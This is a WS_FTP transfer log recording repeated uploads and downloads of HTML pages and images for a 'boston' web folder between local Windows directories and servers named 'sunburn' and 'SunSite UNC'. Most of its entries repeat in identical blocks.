10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
